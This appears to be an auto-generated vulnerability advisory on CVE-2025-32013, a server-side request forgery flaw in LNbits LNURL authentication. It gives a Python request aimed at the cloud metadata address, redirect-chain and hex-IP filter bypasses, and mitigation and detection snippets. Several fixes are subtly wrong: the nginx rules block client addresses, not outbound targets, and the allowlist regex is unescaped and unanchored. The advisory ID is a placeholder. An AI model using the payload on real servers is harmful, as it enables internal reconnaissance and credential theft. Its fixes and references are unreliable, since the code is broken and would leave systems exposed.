How CVE-2025-32013 Works
The vulnerability in LNbits stems from improper validation of user-supplied callback URLs during LNURL authentication. When processing authentication requests, the application uses the `httpx` library to fetch external resources without proper URL sanitization. Attackers can craft malicious LNURLs containing internal IP addresses or restricted endpoints (e.g., http://127.0.0.1/admin`). Since the server follows HTTP redirects, this allows unauthorized access to internal services, cloud metadata APIs, or sensitive endpoints. The lack of network-layer restrictions or allowlist validation enables SSRF exploitation, potentially leading to data leaks or internal network reconnaissance.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: LNbits
Version: Pre-1.12.0
Vulnerability: SSRF via LNURL
Severity: Critical
Date: 2025-04-06
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Exploitation:</h2>
<h2 style="color: blue;">1. Craft malicious LNURL:</h2>
import requests mal_url = "https://lnbits.com/api/v1/lnurl/auth?callback=http://169.254.169.254/latest/meta-data" response = requests.get(mal_url)
2. Bypass filters: Use redirect chains (http://attacker.com/redirect→http://localhost`) or obfuscated IPs (0x7f000001).
Mitigation:
1. Patch: Upgrade to LNbits 1.12.0+.
2. Network hardening:
location /api/v1/lnurl {
deny 127.0.0.1;
deny 10.0.0.0/8;
}
3. Code fix: Validate URLs via regex:
import re
ALLOWED_DOMAINS = r'^(https?://)([a-z0-9.-]+.lnbits.org)'
if not re.match(ALLOWED_DOMAINS, url):
raise ValueError("Invalid URL")
Detection:
1. Log analysis:
grep -E 'GET /api/v1/lnurl.(127.0.0.1|192.168|10.)' /var/log/lnbits/access.log
2. WAF rules: Block requests with internal IPs in query strings.
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- CVSS 4.0 Vector: `AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N`
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-32013
Extra Source Hub:
Undercode
